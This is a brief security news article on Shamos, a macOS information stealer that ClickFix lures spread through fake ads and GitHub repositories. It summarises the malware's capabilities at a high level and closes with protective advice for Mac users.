A newly discovered Mac malware named Shamos is being spread through deceptive ClickFix attacks that disguise themselves as troubleshooting guides or system fixes. Security researchers at CrowdStrike say Shamos is a variant of the Atomic macOS Stealer (AMOS), created by the group “COOKIE SPIDER,” and is capable of stealing browser data, Keychain items, Apple Notes, and cryptocurrency wallet information. Since June 2025, more than 300 environments worldwide have been targeted.
Victims are tricked into running malicious commands copied from fake ads or GitHub repositories, which instead of fixing issues, install Shamos through a downloaded Bash script. The malware bypasses Gatekeeper protections, checks for sandbox environments, and then gathers sensitive files before sending them to attackers. If run with elevated privileges, it ensures persistence by installing a malicious LaunchDaemon and can also fetch additional payloads like fake Ledger apps or botnet modules.
Experts warn macOS users not to execute online commands they don’t fully understand and to avoid sponsored search results when troubleshooting. Safer alternatives include Apple’s official forums or the system’s built-in help features. ClickFix attacks have become a widespread tactic in recent years, also used to spread ransomware and even by state-sponsored hackers.
